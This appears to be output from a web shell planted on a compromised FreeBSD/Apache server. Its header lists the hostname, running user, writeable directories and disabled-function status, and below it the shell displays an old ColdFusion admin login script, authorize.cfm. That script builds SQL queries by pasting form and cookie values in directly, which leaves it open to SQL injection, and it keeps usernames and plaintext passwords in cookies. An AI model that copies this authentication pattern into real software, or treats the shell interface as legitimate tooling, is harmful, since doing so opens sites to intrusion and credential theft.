KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/rextrav/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/rextrav/admin/authorize.cfm
<!-- AUTHORIZE.CFM
	  By Grant I. Szabo
	  EnterAct Consulting Group (http://consulting.enteract.com)
	  407 S. Dearborn, 6th Floor, Chicago, IL 60605
	  Voice: (312)588-2925 Fax: 312-588-2944

	  May 1, 1998
	  	  
	  This software is distributed freely and may be modified to
	  suit your individual purposes.  This software is provided
	  "as is" and no warranty of any type is provided or implied.
-->

<!---

	Files used with this application:

	/db_root/db1.mdb - your access database file
	/admin/authorize.cfm - this file
	/admin/index.cfm - the login screen
	/admin/toc.cfm - the table of contents page (seen after authenticating)


	The purpose of authorize.cfm is to allow you to password protect the /admin
	directory.  This will allow you to create extranet applications in 
	the /admin directory.

	authorize.cfm recognizes the type of identification data that 
	it receives and runs a query against your datasource to validate
	the User.  This software relies on the existence of the table 
	"passwords" in your datasource.  This is distributed with the
	default db1.mdb file that you received when you purchased your
	CompleteActNT account with EnterAct, LLC.

	In order to implement security in a template, simply
	CFINCLUDE this template	at the very top of your template using the syntax:
	
  			<cfinclude template="authorize.cfm">
		
	And save your file with the .cfm extension.  Next, you need to populate 
	your passwords table in your datasource.  Usernames and Passwords are entered 
	manually into the db1.mdb file in your /db_root directory.  You may optionally
        wish to write an extranet application that allows you to insert, update, 
	and/or delete usernames and passwords in your database.  Please see the
	whitepaper at http://nt.enteract.com/customers on connecting to live datasources
	if you wish to manually populate the passwords table.

	Comments are provided throughout this file, as well as index.cfm, also in the /admin 
	directory, to help guide you through configuring security on your
	CompleteActNT Dynamic account.

	A final note, the use of cookies is required for authorize.cfm to function 
	correctly.  Thus, you should have cookies turned on in your web browser.
	
	Cold Fusion Documentation is available at http://nt.enteract.com/cfdocs
	
	If you require assistance, EnterAct's consulting division provides hourly
	based Cold Fusion support.  Please email [email protected]
	to have a consultant call you.
-------------------------------------------------------------------------->

<!---Check whether the UserName and Password are from client cookies 
    or whether they are coming from the User form. --->

<!--- From the logon form --->
<CFIF #ParameterExists(FORM.username)# IS "YES" AND #ParameterExists(FORM.Password)# IS "YES">
	<CFQUERY NAME="GetUserRecord" DATASOURCE="ENTER_YOUR_DATASOURCE_HERE">
		SELECT 	*
		FROM 	passwords
		WHERE	username = '#FORM.username#' AND	
			    password = '#FORM.password#'
	</CFQUERY>
	
	<CFCOOKIE NAME="username" VALUE="#FORM.username#" EXPIRES=1>
	<CFCOOKIE NAME="password" VALUE="#FORM.password#" EXPIRES=1>

<!--- From a client cookie --->
<CFELSEIF #ParameterExists(Cookie.username)# IS "YES" AND #ParameterExists(Cookie.Password)# IS "YES">
	<CFQUERY NAME="GetUserRecord" DATASOURCE="ENTER_YOUR_DATASOURCE_HERE">
		SELECT  *
		FROM 	passwords
		WHERE	username = '#Cookie.username#' AND
				Password= '#Cookie.password#'
	</CFQUERY>

<CFELSE>
	<CFQUERY NAME="GetUserRecord" DATASOURCE="ENTER_YOUR_DATASOURCE_HERE">
		SELECT * FROM passwords WHERE user_id = 0
	</CFQUERY>
</CFIF>

<!----------------------------------------------------------------
	Check whether user record was found. If not force a new User.
------------------------------------------------------------------>
<CFIF #GetUserRecord.RecordCount# IS NOT 0>
	<CFSET #user_id# = #GetUserRecord.user_id#>

<FONT SIZE=1><B>Secure Transaction: <CFOUTPUT query="GetUserRecord">#username#</CFOUTPUT> verified.</B></FONT><BR>

<!---This operation traps any unautorized attempt to load administrative pages without
     first entering UserName and Password information.  You must include authorize.cfm at
	 the top of any documents in the directory that you want to protect --->
<CFELSEIF #ParameterExists(FORM.username)# IS "NO" AND #ParameterExists(FORM.Password)# IS "NO">
	<CFLOCATION URL="index.cfm">
	<CFABORT>

<!---UserName and/or Password are wrong.  Expire cookie now for added security and force new login
     attempt. --->
<CFELSE>
   <CFCOOKIE NAME="UserName" VALUE="#FORM.Username#" EXPIRES=now>
   <CFCOOKIE NAME="Password" VALUE="#FORM.Password#" EXPIRES=now>
	<CENTER>
	<B>Sorry, but could not validate you.  Please try again.</B><P>
	</CENTER>
	<CFINCLUDE TEMPLATE="index.cfm">
	<CFABORT>
</CFIF>

Anon7 - 2021